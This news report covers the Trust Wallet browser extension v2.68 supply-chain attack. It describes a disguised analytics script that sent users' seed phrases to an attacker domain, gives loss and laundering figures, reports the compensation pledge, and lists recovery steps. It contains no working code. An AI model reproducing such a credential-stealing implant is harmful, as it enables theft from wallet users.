On the 24th , Trust Wallet's browser extension v2.68 was confirmed to contain malicious code, causing users to suffer a total loss of approximately $7 million (official statistics) in just two days. CZ immediately announced that all losses would be compensated by the official team. Because the incident was a "fake version" attack, it is equivalent to the software containing vulnerabilities at the release stage, and users could not escape the vulnerability regardless of their caution.
How malware infiltrates the official version
According to the reverse engineering results from the SlowMist team, attackers added a file named 4482.js to version 2.68, masquerading as an analytics module. When a user enters or imports a seed phrase, the script packages the private key and sends it to a server located at api.metrics-trustwallet.com. Due to the compromised release process, the malicious component was distributed along with the official signature, making it impossible for antivirus software and browser censorship to intercept it in time.
On-chain evidence suggests the crime was committed by a "professional team".
Chain detectives ZachXBT and Lookonchain traced multiple highly active withdrawal routes: BTC, ETH, and SOL were rapidly split and flowed into platforms such as KuCoin, ChangeNOW, and FixedFloat, with approximately $4.25 million already laundered. As of the morning of December 26, approximately $2.8 million remained in the attacker's address. The speed of fund splitting and the preparedness of the jump accounts indicate that this was done by a well-trained team, not a hastily assembled phishing group.
Official response and compensation plan
More than 30 hours after the incident surfaced, Trust Wallet finally issued a statement acknowledging the vulnerability. The actual controller, CZ(CZ), subsequently stated in a social media post:
If the loss is within a manageable range, we will provide full compensation through the SAFU Fund.
While the promise has temporarily stabilized the market, it also highlights the contradiction that decentralized wallets still rely on centralized capital to bail them out should something go wrong.
Emergency handling for affected users
Simply updating or removing the extension is insufficient to eliminate the risk, as the seed phrase has already been leaked. The cybersecurity team recommends:
- Disconnect from the network and generate a new wallet in an offline environment.
- Transfer remaining assets by entering your private key using a hardware wallet or a new device.
- Deactivate and permanently abandon the old address.
Trust Wallet will release a full forensic report and improvement procedures later. The cybersecurity community is calling on open-source projects to accelerate the adoption of reproducible builds to reduce the chances of supply chain tampering.
